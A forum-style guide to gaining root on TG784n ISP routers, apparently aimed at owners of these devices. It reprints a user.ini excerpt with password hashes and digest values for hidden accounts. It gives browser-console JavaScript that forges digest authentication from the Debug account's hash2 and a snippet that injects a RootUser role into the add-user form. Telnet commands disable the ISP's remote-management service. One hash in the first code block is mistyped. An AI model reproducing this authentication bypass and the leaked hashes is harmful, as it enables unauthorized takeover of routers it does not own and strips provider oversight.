HowTo Root TG784n

Root TG784n the easy way

1) This guide implies that you have somehow obtained user.ini for your ISP router.

2) Getting user info and hash2
--- Open user.ini
--- Navigate to [ mlpuser.ini ]
--- you should see something like this example from MEO ISP routers - TG784n firmware 10.2.1.D:

[ mlpuser.ini ]

add name=Administrator
password=_CYP2_8ae001dc8a74bc6e607a2e8226ddd02fdbbf4cd23aa512d4 role=Administrator
hash2=4c0f71fd4ae422b426a4eebec6e8d28b crypt=zzEululifVOf6 deflocadmin=enabled

add name=meo password=_CYP2_b3f47eb5f04658f714f389ab9362479ba0a947b5255d3469
role=Administrator hash2=99010e61fcf8b6c41fb97cf64dadf79e crypt=IPboDYcp4oUrE

add name=sumeo password=_CYP2_7bf31c88f33a6bad4d59a1df0ddfc97e6627cc719c91af4c role=SuperUser hash2=094a55fcfbf4850f0f9eef4b5c1ff490 crypt=bSn.KCkvVpgWY

add name=Debug password=_CYP2_e1b57ae009db01c58dd6009be1fb24f0d96e4df96dac40bd
role=RootUser hash2=91cd28f3d8d3a503e9839caaa2929123 crypt=bD0z/Y6EF7zKw

add name=nauser password=_CYP2_1b6337e5b0a3bb0395695acdedcb203c8cd47d5c8b1785b0
role=NA hash2=f8700f3bb4e73cc4bb5229def20ce0d0

--- take note of the "hash2" code from the user "Debug", in this case is
"91cd28f3d8d3a503e9839caaa2929123"

3) Open TG784n web interface, normally by entering 192.168.1.254 in web browser (use GOOGLE CHROME)
--- in username enter Debug
--- the press "ctrl+shift+j" to open the Console Tab
--- the paste this in the console (copy&paste the hash2 code you obtained
earlier):

var user = "Debug";
var hash2 = "91cd28f3d8d3a503e9839caka2929123";

var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +
":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();

--- press "enter", you are now root.
However you still don’t know the root password.
Don’t worry, we shall create another root.

4) Creating another root user.
You will need FIREFOX browser and the TAMPER DATA extension.

--- Enter TG784n web interface using the Debug user by the method described earlier, but use FIREFOX (notice that the web-console for this browser is accessed by "ctrl+shift+k" and that you must paste the data from step 3 in the "scrathpad", press "execute" to run it)

--- As "Debug" Go to "add new User".
--- Create user. per eg U: admin, Pass: admin,
--- Just don’t press "apply" yet.
--- open TAMPER DATA instead and iniciate it. In this extension, change the field "Adminstrator" to "RootUser" (case sensitive). Press OK.
Let it save the changes...

Now you have a new root user = admin.
You are free to access your router via TELNET.
Enjoy!

Avoid Firmware upgrades by using CLI in Telnet mode with root-user:

Quote :

service system modify name=CWMP-S state=disabled
service system modify name=CWMP-C state=disabled
saveall

Create username with "root" privileges.

Quote :

script add name=useroot command="user add name=me password=pass role=root"

Change "me" and "pass" for your own username and password.

Quote :

script run name=useroot pars=""

Run the script.

Quote :

saveall

Don't forget this!

I found a little trick that allows you to create a root user without needing the TamperData extension or Firefox explicitly.

Firstly, let me add the same information specifically for the TG784n v3, where only the hash2 for Debug user is different.

TG784n v3
1. Go to the login page (http://192.168.1.254);

2. Open your browser's console (Ctrl+Shift+J for Chrome and Ctrl+Shift+K for Firefox);

3. Paste the following code on the console, followed by the Enter key:

Code:

var user = "Debug";
var hash2 = "276da5030a939d29642637f279629770";

var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();

Once you are logged in with your root user, you should create one for yourself. Now, this next part is what doesn't need TamperData to create the root user and might work on other TG784n (or more) versions.
To do this:

1. Go to the page where you manage the users and click on the option to create a new user (http://192.168.1.254/cgi/b/users/cfg/usraccaddrem/?be=0&l0=3&l1=10&tid=ADD_USER).
Fill in the form with your intended username and password, as for the role, don't bother with it since RootUser will not be on the list and also DO NOT click 'Apply';

2. As with the login exploit, open your browser's console (Ctrl+Shift+J for Chrome and Ctrl+Shift+K for Firefox);

3. Paste the following code on the console, followed by the Enter key:

Code:

var Privilege = document.getElementsByName('31')[0];
Privilege.options[0].value = 'RootUser';
Privilege.selectedIndex = 0;
submitForm(document.usrAccDef,10,1,"usrAccApply","",0,"");

That's it! You have now created your own root user without needing any third-party extension.